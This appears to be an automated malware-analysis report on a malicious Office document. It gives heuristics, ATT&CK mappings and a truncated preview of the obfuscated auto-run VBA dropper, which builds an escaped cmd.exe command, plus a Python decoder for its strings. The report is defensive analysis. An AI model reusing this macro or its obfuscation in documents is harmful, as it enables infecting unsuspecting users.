Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample contains a VBA macro that runs automatically when the document is opened, as flagged by the OLE_VBA_DOCOPEN and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics. The critical OLE_VBA_SHELL heuristic confirms a Shell() call, which droppers of this kind use to launch a command line that fetches and runs a second stage. The extracted source (below) is padded with junk arithmetic on undeclared variables; the real payload is assembled in helper functions such as BYGnRVMu from split string literals and Chr() calls (Chr(109) = "m", Chr(99) = "c", Chr(34) = a double quote). The visible fragments decode to md /c FOR /F "delims=fQG tokens= 1 " followed by the loop variable %^C and an IN ( ... ) clause, with ";" and "," inserted as noise that cmd.exe treats as token separators, and with doubled carets (^^) indicating a second layer of cmd escaping. Document_open concatenates the return values of about twenty such helpers around a literal CVar("c") and hands the result to the macro CwuuNBI via Application.Run; that macro, and therefore the Shell() call itself, is not in the visible preview. The ClamAV detection name Doc.Malware.Valyria-6699348-0 supports the verdict. No specific family could be identified.
Heuristics (6)
- ClamAV: Doc.Malware.Valyria-6699348-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Valyria-6699348-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier found in any Office document that contains drawing markup, not a network indicator; do not treat it as a download or C2 URL.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32471 bytes | a643a80903f7ca2394b917ffefeb03decb6e82d43f3eb7e4d330c90907780e6d |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "jHpzUjBSRc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function zCvwahASJXiK()
GWRQv = (26065 / VcHoc)
VmEEN = (77621 / CoPqFh)
oPYXdh = (20836 / ocFPA)
zUHvt = (32657 / tnBTB)
hNRwdb = (63560 / BdtbMs)
KfMtSd = (74514 / jkXdWk)
End Function
Private Sub Document_open()
On Error Resume Next
mhqlXG = FIkNQU / ZdWQj / 9123 - VZwBH + qCjvVX + 21095 + (FWCdNn * pXFQBd + zwhwEm / HtkPc)
DzJcu = maWZls / iAYkj / 28041 - TcNNv + NJTsfs + 89625 + (YSEIqs * HrzGNq + cWsGR / lbmvj)
viKjoj = 14236 + 18842 - 39152 + zUErkk / qkwtqR - jBNTL * 90668 * zrKNvJ - jtArqW + uiTmaw * (KwsFQu * nSowZw + duiob + HqzBz)
cGdtsz = 60935 + 11324 - 65622 + bqVkM / PHhFAj - zZbZFz * 62529 * brGBA - EOPKG + BRPvkZ * (Wozslw * dTRYZ + BLzwP + LXLtSv)
rYArFNGOuED = Application.Run("CwuuNBI", "" + ossJXUGTmV + fCqkFAJE + CVar("c") + WTYfzcSOk + QiNXsFNqdudnf + BYGnRVMu + YikODKscjCi + jiLmmf + hRvHE + KpbMjw + jtLZXzE + mjjCm + kjWwU + EpKuRON + XhAUr + AivvHLcihtm + hcGjZORPC + zvhNCWB + wjcdlPv + nQuqv + WujkwEmvSIfP + bMtRazRkpzzkUT)
FVcORY = 15315 + 26604 - 50832 + PhcVJM / LPkHhU - UmEil * 27490 * SwaCJm - iCEfr + hkIUon * (JEOjX * JuiUZ + MHzkBS + ZEjMfc)
wwNzQ = 57585 + 92523 - 25483 + iVDUZd / YuIiM - bpvqJ * 64585 * ABnPBo - UIUVBJ + Bcrmt * (wcdPM * tVYCaU + hijhn + kCjPa)
mkikuz = 8951 + 51687 - 27016 + qfJdcz / fCfbkz - BoNFc * 83629 * HhOWKA - iiHjjC + nqwbj * (AZLKCk * iGkzw + zjwvG + zwAXX)
End Sub
Function mZMDEQM()
FdaNZ = 39516 + 50284 - 90594 + EvcjmQ / jLwTz - VXOlbH * 20569 * bnTPz - UcLKJa + nvzikn * (zJMfa * HDwot + kWdHI + nliGA)
YYDNv = 10935 + 91694 - 13239 + AnbjUu / SISPM - cjkHv * 24397 * WECwKI - kFpwl + jmsbD * (RzlHt * LUwXc + KiIXvk + YMlTMS)
WrjzDT = 17132 + 48165 - 78403 + nMDlI / IJVZr - spHjj * 32168 * ZzPNOq - wLWiF + XiwinD * (XBHwpw * zrrUjs + OZYwpv + GwnqT)
ZTGZF = 6789 + 32221 - 51873 + LQABnj / diFvW - zWIDb * 85463 * KESna - zqWSRa + pwmQwi * (owMiQ * OWjRCb + CXGzM + LmaGMo)
Kqdvj = 34749 + 14502 - 47178 + RYQtHH / BuNwI - ajwHz * 31219 * UHVzu - AOZDam + iGZYCt * (dmwFzt * QzwYU + UXJCQw + HFbrn)
WwksGz = 40327 + 69086 - 22808 + kXiNbH / QpCqR - oDWSlN * 84617 * tvTrX - YvdDSL + NpwzL * (BvwSm * Hvpkf + VTsqbL + DIjUL)
EWpnJE = 82196 + 90679 - 97042 + wJfwnN / dBmCz - qIzis * 62412 * YpXoHw - kTjTn + mzbwa * (XGjQj * ENwfLa + OSMHmq + oGcJRT)
End Function
Attribute VB_Name = "OicPGrTFWR"
Function BYGnRVMu()
On Error Resume Next
KYAiz = LYROEK / 26514 / 94534 * ZznwGl / RuErc - SzZaF * 85706 - kBjQU + (25754 / 13826 / 41040 / wojAr)
fwooz = 14630 / iGOFG - 33419 / iFVXNY + 37185 * dtisz * QHbOab + 87624
IPqsWikvm = CStr(Chr(EzCGaZiHp + pAjuiQGrS + 109 + VdswjJGPHNQlzw + mbaYIdGYaqMMs)) + "d /" + CStr(Chr(vQHdYNcsYBawCZ + zqcUQsaosXUX + 99 + uWuRUUpSTaJiBX + EwKIOWQtfCpT)) + " FOR " + " ; /F" + " ;" + " " + CStr(Chr(sECbHEC + vsfWBKh + 34 + FLTWNhi + AlSiWhR)) + " "
IjQrdj = 13034 / HXSLvR - 43819 / SqbBB + 41774 * ZkOmu * qSjoI + 26397
ccvCK = 13185 / ADiSi - 28272 / iSEIVu + 19136 * KINzm * fpwCoR + 91317
QMWldo = 36779 / hswkIX - 71029 / WuXSn + 78593 * UQVOi * uzhtp + 76788
TcvwSwP = "deli" + CStr(Chr(faQiiTt + jzPiwMmNa + 109 + rVsiwBzmQW + TFBQnbj)) + "s=fQ" + "G to" + "kens" + "= 1 " + CStr(Chr(wRzYqRnGsIH + NKhhfdTG + 34 + luwdzvwmuiutEt + jMjXNqWI)) + " " + "," + " " + "%^C" + " ,"
JIEjJw = 92563 / UdaJb - 98806 / uznYq + 11917 * tLXQE * WmDIRq + 62252
VMJdNu = 18688 / HPTXu - 21459 / pQVvPs + 18133 * tNAhZR * kTszba + 27460
CbkwujIwz = " ; IN" + " , " + " ; ( " + "," + " ' ; ;" + " ^^FT^" + "^y^"
nDXOS = 78931 / TtdHz - 36236 / KtUXTt + 26398 * GuWYR * zdpjrC + 22248
jrPBl = 22762 / bdTAVk - 7080 / LUQQN + 23180 * CPiAiz * AbDcbf + 750
IBYGww = 83168 / ipsPG - 95840 / fIzpAX + 71265 * isdszs * XEScI + 29770
sfiSka = "^Pe" + " " + "; ^| " + "
... (truncated)
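As an added example, not part of the report or of the analyzer's own tooling: a small Python evaluator for the string-building idiom seen in BYGnRVMu above. It takes the three visible assignments (copied verbatim from the preview as its sample input), treats every undeclared identifier as Empty, which VBA coerces to 0 in arithmetic and to "" in concatenation when a module has no Option Explicit and the name is never assigned (none of the padding names is assigned anywhere in the visible source; that is this example's assumption), folds CStr/CVar/Chr, and then collapses the ";" and "," padding that cmd.exe treats as token separators and strips one layer of "^" escaping. The function names are this example's own, and the page does not show how BYGnRVMu's return value is assembled from these fragments, so they are decoded as stand-alone strings rather than joined.

```python
import re

# Constructed input: the three string-building assignments visible in the
# BYGnRVMu preview, copied verbatim from the report. The function is
# truncated on the page, so the tail of the command is not reconstructed.
SAMPLE_LINES = [
    'IPqsWikvm = CStr(Chr(EzCGaZiHp + pAjuiQGrS + 109 + VdswjJGPHNQlzw + mbaYIdGYaqMMs))'
    ' + "d /" + CStr(Chr(vQHdYNcsYBawCZ + zqcUQsaosXUX + 99 + uWuRUUpSTaJiBX + EwKIOWQtfCpT))'
    ' + " FOR " + " ; /F" + " ;" + " " + CStr(Chr(sECbHEC + vsfWBKh + 34 + FLTWNhi + AlSiWhR)) + " "',
    'TcvwSwP = "deli" + CStr(Chr(faQiiTt + jzPiwMmNa + 109 + rVsiwBzmQW + TFBQnbj)) + "s=fQ"'
    ' + "G to" + "kens" + "= 1 " + CStr(Chr(wRzYqRnGsIH + NKhhfdTG + 34 + luwdzvwmuiutEt + jMjXNqWI))'
    ' + " " + "," + " " + "%^C" + " ,"',
    'CbkwujIwz = " ; IN" + " , " + " ; ( " + "," + " \' ; ;" + " ^^FT^" + "^y^"',
]

CALL_RE = re.compile(r"^(CStr|CVar|Chr)\((.*)\)$", re.S)
ARITH_OK = re.compile(r"^[\d\s+\-*()]+$")


def split_top_level(expr, sep="+"):
    """Split a VBA expression on `sep` at parenthesis depth 0, outside string literals."""
    parts, cur, depth, in_str, i = [], [], 0, False, 0
    while i < len(expr):
        c = expr[i]
        if in_str:
            cur.append(c)
            if c == '"':
                if i + 1 < len(expr) and expr[i + 1] == '"':   # "" inside a literal is an escaped quote
                    cur.append('"')
                    i += 1
                else:
                    in_str = False
        elif c == '"':
            in_str = True
            cur.append(c)
        elif c in "()":
            depth += 1 if c == "(" else -1
            cur.append(c)
        elif c == sep and depth == 0:
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(c)
        i += 1
    parts.append("".join(cur).strip())
    return parts


def vba_int(inner):
    """Evaluate a numeric argument with every identifier treated as Empty (0).

    Assumption: the padding identifiers are undeclared and never assigned, so
    VBA evaluates them as 0 and only the integer literals contribute.
    """
    numeric = re.sub(r"[A-Za-z_]\w*", "0", inner)
    if not ARITH_OK.match(numeric):
        raise ValueError(f"unsupported arithmetic: {inner!r}")
    return int(eval(numeric, {"__builtins__": {}}, {}))  # validated: digits, + - * ( ) only


def eval_operand(op, env):
    if op.startswith('"'):                       # string literal
        return op[1:-1].replace('""', '"')
    m = CALL_RE.match(op)
    if m:
        fn, inner = m.groups()
        if fn == "Chr":
            return chr(vba_int(inner))
        return eval_expr(inner, env)             # CStr/CVar are identity on strings here
    return env.get(op, "")                       # unassigned identifier -> Empty -> ""


def eval_expr(expr, env):
    """Concatenate the top-level '+' operands of a VBA string expression."""
    return "".join(eval_operand(p, env) for p in split_top_level(expr))


def eval_assignments(lines):
    """Evaluate `name = expr` lines in order; later lines may reference earlier names."""
    env = {}
    for line in lines:
        name, _, expr = line.partition("=")
        env[name.strip()] = eval_expr(expr.strip(), env)
    return env


def collapse_delims(s):
    """cmd.exe treats space, comma and semicolon as token separators; fold runs to one space."""
    return re.sub(r"[ ,;]+", " ", s)


def strip_carets(s):
    """Remove one layer of cmd.exe escaping: ^x -> x, ^^ -> ^."""
    return re.sub(r"\^(.)", r"\1", s)


def decode_report_fragments():
    """Decode the fragments copied from the report; returns {name: plaintext}."""
    return eval_assignments(SAMPLE_LINES)


if __name__ == "__main__":
    for name, value in decode_report_fragments().items():
        print(f"{name:10} raw:     {value!r}")
        print(f"{'':10} cleaned: {collapse_delims(strip_carets(value)).strip()!r}")
```

Run with python3; it prints each fragment raw and cleaned. The first two decode to md /c FOR /F "delims=fQG tokens= 1 " and the loop variable %^C, i.e. the head of a cmd.exe FOR /F loop, which is the shape the summary describes. The doubled carets in the third fragment mean that text is escaped for a second cmd.exe layer, so apply strip_carets once per layer when the full command is recovered from the untruncated source.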